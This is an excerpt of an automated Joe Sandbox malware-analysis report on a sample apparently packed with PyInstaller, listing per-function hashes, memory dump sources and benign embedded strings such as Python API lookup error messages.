                                                                                                                                          • Instruction ID: 8268c8a4806c9ddbb1846eb173311741edb8ae008d2f476e89857c1decae7747
                                                                                                                                          • Opcode Fuzzy Hash: 4004e6f7831e6380f0c7a9c187e4f56c2fba6a50471e57e5591c0e9cd6f9eb67
                                                                                                                                          • Instruction Fuzzy Hash: 23B17D77A08B8595E765CF29C19023DBBA0EB4BF68F288235DA4E87395EF39D441C740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 84378e74e3abe4b2e50357a3cae6d1c9f133da408f6cd3af500eca0aac5fc0e9
                                                                                                                                          • Instruction ID: 7fa24b429966cb0bc5ad64290327bbba85dadac0543d3018e06ed7f6f26e6309
                                                                                                                                          • Opcode Fuzzy Hash: 84378e74e3abe4b2e50357a3cae6d1c9f133da408f6cd3af500eca0aac5fc0e9
                                                                                                                                          • Instruction Fuzzy Hash: E681F572A08B8156E774CB19964037AB691FB87BE4F144335EA8D93B99EF3DD4408B10
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                          • Opcode ID: 970fa9c1e70947ae83e04df9520a0fb1810d06995f6d4a160b1c2f03216b318c
                                                                                                                                          • Instruction ID: ce8824e41aaf8f795c59c789e4444162855e3b9ef8a882f8f65dc2a18fc396bf
                                                                                                                                          • Opcode Fuzzy Hash: 970fa9c1e70947ae83e04df9520a0fb1810d06995f6d4a160b1c2f03216b318c
                                                                                                                                          • Instruction Fuzzy Hash: 2861E573E19A8286FB69CA2884507BDE681AF42F70F140639E65DC76C4FF6FE840D640
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
                                                                                                                                          • Instruction ID: 5c8cdc39ad571ba73e9673f322d9e669885d23a1198031ad9313dab3f4f2acf3
                                                                                                                                          • Opcode Fuzzy Hash: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
                                                                                                                                          • Instruction Fuzzy Hash: 26519B3AA14E5196E724CB29C28033973A1EB56F78F244231CE4D977A4EF7AE843C740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
                                                                                                                                          • Instruction ID: 68839405999de22c27880e55d0a4c6f303837df3dfacde7a59494c1de5b3ec78
                                                                                                                                          • Opcode Fuzzy Hash: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
                                                                                                                                          • Instruction Fuzzy Hash: 72516176A18E5196E764CB29D140238B7B0EB4AF78F244231DE4D977A4EF3AE853C740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
                                                                                                                                          • Instruction ID: b7262633954da2c6e92254b9aa4d7b3034998ada94f8ac49dfeca659c3ebdd45
                                                                                                                                          • Opcode Fuzzy Hash: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
                                                                                                                                          • Instruction Fuzzy Hash: 4E51933AA18F5196E724CB29D190238B7A0EB56F78F245131CE4D877A4EF3AE943C740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
                                                                                                                                          • Instruction ID: a4e10ea0436472cb52a15633a7de3f7b4899fef744c7810a678e6a58fc6a4d21
                                                                                                                                          • Opcode Fuzzy Hash: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
                                                                                                                                          • Instruction Fuzzy Hash: 19515377A18A5196E724CB29C150338B7B1EB46F68F284231DE4D97794EF3AE853C780
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
                                                                                                                                          • Instruction ID: c301c577b92ddd47ededfb3d2bc2154e870c7d1e642263968e34d25b0571de2a
                                                                                                                                          • Opcode Fuzzy Hash: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
                                                                                                                                          • Instruction Fuzzy Hash: 10518636A18E9195E764CF29C140238B7B1EB46F69F244231DE4D977A4EF3AE853C780
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
                                                                                                                                          • Instruction ID: d059a4540d9c6fa9a20579a5abca3c712a2e452838ab396774fa46826a3437a2
                                                                                                                                          • Opcode Fuzzy Hash: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
                                                                                                                                          • Instruction Fuzzy Hash: 6251973AA18E5195E764CB29C58063C77A1EB46FB8F644131CE4C97798DF3AE853C740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                          • Instruction ID: ead994e3d8b8230836818deb1f07db85b44c410f9998d15b55863dad516850cc
                                                                                                                                          • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                          • Instruction Fuzzy Hash: FF41D872D4DE4A1CE9A5CA1807117B8AA809F13FB0D1853B4DD9D9B3D3FD0D659AD100
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 588628887-0
                                                                                                                                          • Opcode ID: c7727d54e500596d2d5616afa7c36a47d45200368430125e141568a376632c0e
                                                                                                                                          • Instruction ID: 00b1c7523a7bd90ebc197c9f28f3b40d4c042e8ab6fd74e2e2ac6a0ee3f7e36c
                                                                                                                                          • Opcode Fuzzy Hash: c7727d54e500596d2d5616afa7c36a47d45200368430125e141568a376632c0e
                                                                                                                                          • Instruction Fuzzy Hash: 1941D372B14E5582FF58CF2ADA1416AB3A1AB49FE0B499132DE0DD7B58EF3CD5468300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 97dbf60876fcd0633a649bc779bfe1af7a9be6d7cd19397e9a759bc507e901db
                                                                                                                                          • Instruction ID: 04b09178c32eb6e3f4aabe8a1ae20dd3666c48c142e71a218b4ef2171ae9e994
                                                                                                                                          • Opcode Fuzzy Hash: 97dbf60876fcd0633a649bc779bfe1af7a9be6d7cd19397e9a759bc507e901db
                                                                                                                                          • Instruction Fuzzy Hash: 0A318472B0DF4281EB65DB25654017DE6D5AB86FA0F144238EE5E93BD6EF3CD4018704
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d9053913a188439c949862f5252d0d96588d6a3198c5220388b8f4d277b857ee
                                                                                                                                          • Instruction ID: 30c473c80fa0fcadde6668041b16fd44470bbc31599a8b095e2a738fbf56ee0d
                                                                                                                                          • Opcode Fuzzy Hash: d9053913a188439c949862f5252d0d96588d6a3198c5220388b8f4d277b857ee
                                                                                                                                          • Instruction Fuzzy Hash: 00F06871718A958ADB948F29A403629BBD0F7487D0F908139D58DC3F04DB3C91518F04
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cfc8547ea6af2cfbec2828df990cd3d0a6205bb3f5e3ae253026f3a9dd74dc92
                                                                                                                                          • Instruction ID: dc5d9c989c1263adf877f56a09a77bd56cb967da5ae3c2595f5146c20646aa19
                                                                                                                                          • Opcode Fuzzy Hash: cfc8547ea6af2cfbec2828df990cd3d0a6205bb3f5e3ae253026f3a9dd74dc92
                                                                                                                                          • Instruction Fuzzy Hash: 35A00235D0CC12D0E7489F60E850070A370FB53B24B504031D00DC10A0FF3DE545C380
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressProc
                                                                                                                                          • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                          • API String ID: 190572456-4266016200
                                                                                                                                          • Opcode ID: f2f88704c5d1e061734efcee993fe9c6dd7b1185595c7391647c05c7e9d36fbf
                                                                                                                                          • Instruction ID: a2d003d416775f3d3f386a476dd17dc019e846573c1c19e40cd1dea13f542cc9
                                                                                                                                          • Opcode Fuzzy Hash: f2f88704c5d1e061734efcee993fe9c6dd7b1185595c7391647c05c7e9d36fbf
                                                                                                                                          • Instruction Fuzzy Hash: 67126174E4EF0390FA59CB29A850174A3B1AF47FB9B949435C80E963A4FF7DF6488240
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Message_fread_nolock
                                                                                                                                          • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                                                                                                          • API String ID: 3065259568-2316137593
                                                                                                                                          • Opcode ID: 35c5a7742de5d5ed4849e394d6fdac3950876f92fb0a8ea3b9b0d7670df73e74
                                                                                                                                          • Instruction ID: 591cb8f53ac070da6805944cbea1b8f62923ad2ff3549888cb2ecaeffc6fed06
                                                                                                                                          • Opcode Fuzzy Hash: 35c5a7742de5d5ed4849e394d6fdac3950876f92fb0a8ea3b9b0d7670df73e74
                                                                                                                                          • Instruction Fuzzy Hash: C751A575E08E8245EA649B21A9506FAE394AF46FE8F504131EE4DC7B89FE7CE5418380
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                          • String ID: P%
                                                                                                                                          • API String ID: 2147705588-2959514604
